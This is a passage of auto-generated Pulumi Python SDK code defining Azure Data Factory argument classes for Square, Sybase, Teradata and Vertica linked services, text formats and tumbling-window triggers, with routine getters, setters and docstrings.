def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class SquareObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Square Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SquareObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SybaseLinkedServiceArgs:
def __init__(__self__, *,
database: Any,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
schema: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for Sybase data source.
:param Any database: Database name for connection. Type: string (or Expression with resultType string).
:param Any server: Server name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: AuthenticationType to be used for connection.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any schema: Schema name for connection. Type: string (or Expression with resultType string).
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'Sybase')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def database(self) -> Any:
"""
Database name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Any):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
Server name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
AuthenticationType to be used for connection.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def schema(self) -> Optional[Any]:
"""
Schema name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[Any]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class TeradataLinkedServiceArgs:
def __init__(__self__, *,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for Teradata data source.
:param Any server: Server name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: AuthenticationType to be used for connection.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'Teradata')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def server(self) -> Any:
"""
Server name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
AuthenticationType to be used for connection.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class TextFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
column_delimiter: Optional[Any] = None,
deserializer: Optional[Any] = None,
encoding_name: Optional[Any] = None,
escape_char: Optional[Any] = None,
first_row_as_header: Optional[Any] = None,
null_value: Optional[Any] = None,
quote_char: Optional[Any] = None,
row_delimiter: Optional[Any] = None,
serializer: Optional[Any] = None,
skip_line_count: Optional[Any] = None,
treat_empty_as_null: Optional[Any] = None):
"""
The data stored in text format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any column_delimiter: The column delimiter. Type: string (or Expression with resultType string).
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any encoding_name: The code page name of the preferred encoding. If miss, the default value is ΓÇ£utf-8ΓÇ¥, unless BOM denotes another Unicode encoding. Refer to the ΓÇ£NameΓÇ¥ column of the table in the following link to set supported values: https://msdn.microsoft.com/library/system.text.encoding.aspx. Type: string (or Expression with resultType string).
:param Any escape_char: The escape character. Type: string (or Expression with resultType string).
:param Any first_row_as_header: When used as input, treat the first row of data as headers. When used as output,write the headers into the output as the first row of data. The default value is false. Type: boolean (or Expression with resultType boolean).
:param Any null_value: The null value string. Type: string (or Expression with resultType string).
:param Any quote_char: The quote character. Type: string (or Expression with resultType string).
:param Any row_delimiter: The row delimiter. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
:param Any skip_line_count: The number of lines/rows to be skipped when parsing text files. The default value is 0. Type: integer (or Expression with resultType integer).
:param Any treat_empty_as_null: Treat empty column values in the text file as null. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
pulumi.set(__self__, "type", 'TextFormat')
if column_delimiter is not None:
pulumi.set(__self__, "column_delimiter", column_delimiter)
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if encoding_name is not None:
pulumi.set(__self__, "encoding_name", encoding_name)
if escape_char is not None:
pulumi.set(__self__, "escape_char", escape_char)
if first_row_as_header is not None:
pulumi.set(__self__, "first_row_as_header", first_row_as_header)
if null_value is not None:
pulumi.set(__self__, "null_value", null_value)
if quote_char is not None:
pulumi.set(__self__, "quote_char", quote_char)
if row_delimiter is not None:
pulumi.set(__self__, "row_delimiter", row_delimiter)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
if skip_line_count is not None:
pulumi.set(__self__, "skip_line_count", skip_line_count)
if treat_empty_as_null is not None:
pulumi.set(__self__, "treat_empty_as_null", treat_empty_as_null)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="columnDelimiter")
def column_delimiter(self) -> Optional[Any]:
"""
The column delimiter. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "column_delimiter")
@column_delimiter.setter
def column_delimiter(self, value: Optional[Any]):
pulumi.set(self, "column_delimiter", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter(name="encodingName")
def encoding_name(self) -> Optional[Any]:
"""
The code page name of the preferred encoding. If miss, the default value is ΓÇ£utf-8ΓÇ¥, unless BOM denotes another Unicode encoding. Refer to the ΓÇ£NameΓÇ¥ column of the table in the following link to set supported values: https://msdn.microsoft.com/library/system.text.encoding.aspx. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encoding_name")
@encoding_name.setter
def encoding_name(self, value: Optional[Any]):
pulumi.set(self, "encoding_name", value)
@property
@pulumi.getter(name="escapeChar")
def escape_char(self) -> Optional[Any]:
"""
The escape character. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "escape_char")
@escape_char.setter
def escape_char(self, value: Optional[Any]):
pulumi.set(self, "escape_char", value)
@property
@pulumi.getter(name="firstRowAsHeader")
def first_row_as_header(self) -> Optional[Any]:
"""
When used as input, treat the first row of data as headers. When used as output,write the headers into the output as the first row of data. The default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "first_row_as_header")
@first_row_as_header.setter
def first_row_as_header(self, value: Optional[Any]):
pulumi.set(self, "first_row_as_header", value)
@property
@pulumi.getter(name="nullValue")
def null_value(self) -> Optional[Any]:
"""
The null value string. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "null_value")
@null_value.setter
def null_value(self, value: Optional[Any]):
pulumi.set(self, "null_value", value)
@property
@pulumi.getter(name="quoteChar")
def quote_char(self) -> Optional[Any]:
"""
The quote character. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "quote_char")
@quote_char.setter
def quote_char(self, value: Optional[Any]):
pulumi.set(self, "quote_char", value)
@property
@pulumi.getter(name="rowDelimiter")
def row_delimiter(self) -> Optional[Any]:
"""
The row delimiter. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "row_delimiter")
@row_delimiter.setter
def row_delimiter(self, value: Optional[Any]):
pulumi.set(self, "row_delimiter", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@property
@pulumi.getter(name="skipLineCount")
def skip_line_count(self) -> Optional[Any]:
"""
The number of lines/rows to be skipped when parsing text files. The default value is 0. Type: integer (or Expression with resultType integer).
"""
return pulumi.get(self, "skip_line_count")
@skip_line_count.setter
def skip_line_count(self, value: Optional[Any]):
pulumi.set(self, "skip_line_count", value)
@property
@pulumi.getter(name="treatEmptyAsNull")
def treat_empty_as_null(self) -> Optional[Any]:
"""
Treat empty column values in the text file as null. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "treat_empty_as_null")
@treat_empty_as_null.setter
def treat_empty_as_null(self, value: Optional[Any]):
pulumi.set(self, "treat_empty_as_null", value)
@pulumi.input_type
class TriggerPipelineReferenceArgs:
def __init__(__self__, *,
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
pipeline_reference: Optional[pulumi.Input['PipelineReferenceArgs']] = None):
"""
Pipeline that needs to be triggered with the given parameters.
:param pulumi.Input[Mapping[str, Any]] parameters: Pipeline parameters.
:param pulumi.Input['PipelineReferenceArgs'] pipeline_reference: Pipeline reference.
"""
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if pipeline_reference is not None:
pulumi.set(__self__, "pipeline_reference", pipeline_reference)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Pipeline parameters.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="pipelineReference")
def pipeline_reference(self) -> Optional[pulumi.Input['PipelineReferenceArgs']]:
"""
Pipeline reference.
"""
return pulumi.get(self, "pipeline_reference")
@pipeline_reference.setter
def pipeline_reference(self, value: Optional[pulumi.Input['PipelineReferenceArgs']]):
pulumi.set(self, "pipeline_reference", value)
@pulumi.input_type
class TumblingWindowTriggerArgs:
def __init__(__self__, *,
frequency: pulumi.Input[str],
interval: pulumi.Input[int],
max_concurrency: pulumi.Input[int],
pipeline: pulumi.Input['TriggerPipelineReferenceArgs'],
start_time: pulumi.Input[str],
type: pulumi.Input[str],
delay: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
retry_policy: Optional[pulumi.Input['RetryPolicyArgs']] = None):
"""
Trigger that schedules pipeline runs for all fixed time interval windows from a start time without gaps and also supports backfill scenarios (when start time is in the past).
:param pulumi.Input[str] frequency: The frequency of the time windows.
:param pulumi.Input[int] interval: The interval of the time windows. The minimum interval allowed is 15 Minutes.
:param pulumi.Input[int] max_concurrency: The max number of parallel time windows (ready for execution) for which a new run is triggered.
:param pulumi.Input['TriggerPipelineReferenceArgs'] pipeline: Pipeline for which runs are created when an event is fired for trigger window that is ready.
:param pulumi.Input[str] start_time: The start time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
:param pulumi.Input[str] type: Trigger type.
:param Any delay: Specifies how long the trigger waits past due time before triggering new run. It doesn't alter window start and end time. The default is 0. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
:param pulumi.Input[str] description: Trigger description.
:param pulumi.Input[str] end_time: The end time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
:param pulumi.Input['RetryPolicyArgs'] retry_policy: Retry policy that will be applied for failed pipeline runs.
"""
pulumi.set(__self__, "frequency", frequency)
pulumi.set(__self__, "interval", interval)
pulumi.set(__self__, "max_concurrency", max_concurrency)
pulumi.set(__self__, "pipeline", pipeline)
pulumi.set(__self__, "start_time", start_time)
pulumi.set(__self__, "type", 'TumblingWindowTrigger')
if delay is not None:
pulumi.set(__self__, "delay", delay)
if description is not None:
pulumi.set(__self__, "description", description)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if retry_policy is not None:
pulumi.set(__self__, "retry_policy", retry_policy)
@property
@pulumi.getter
def frequency(self) -> pulumi.Input[str]:
"""
The frequency of the time windows.
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: pulumi.Input[str]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def interval(self) -> pulumi.Input[int]:
"""
The interval of the time windows. The minimum interval allowed is 15 Minutes.
"""
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: pulumi.Input[int]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> pulumi.Input[int]:
"""
The max number of parallel time windows (ready for execution) for which a new run is triggered.
"""
return pulumi.get(self, "max_concurrency")
@max_concurrency.setter
def max_concurrency(self, value: pulumi.Input[int]):
pulumi.set(self, "max_concurrency", value)
@property
@pulumi.getter
def pipeline(self) -> pulumi.Input['TriggerPipelineReferenceArgs']:
"""
Pipeline for which runs are created when an event is fired for trigger window that is ready.
"""
return pulumi.get(self, "pipeline")
@pipeline.setter
def pipeline(self, value: pulumi.Input['TriggerPipelineReferenceArgs']):
pulumi.set(self, "pipeline", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Input[str]:
"""
The start time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: pulumi.Input[str]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Trigger type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def delay(self) -> Optional[Any]:
"""
Specifies how long the trigger waits past due time before triggering new run. It doesn't alter window start and end time. The default is 0. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
"""
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[Any]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Trigger description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[pulumi.Input[str]]:
"""
The end time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
"""
return pulumi.get(self, "end_time")
@end_time.setter
def end_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_time", value)
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> Optional[pulumi.Input['RetryPolicyArgs']]:
"""
Retry policy that will be applied for failed pipeline runs.
"""
return pulumi.get(self, "retry_policy")
@retry_policy.setter
def retry_policy(self, value: Optional[pulumi.Input['RetryPolicyArgs']]):
pulumi.set(self, "retry_policy", value)
@pulumi.input_type
class VerticaLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Vertica linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Vertica')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
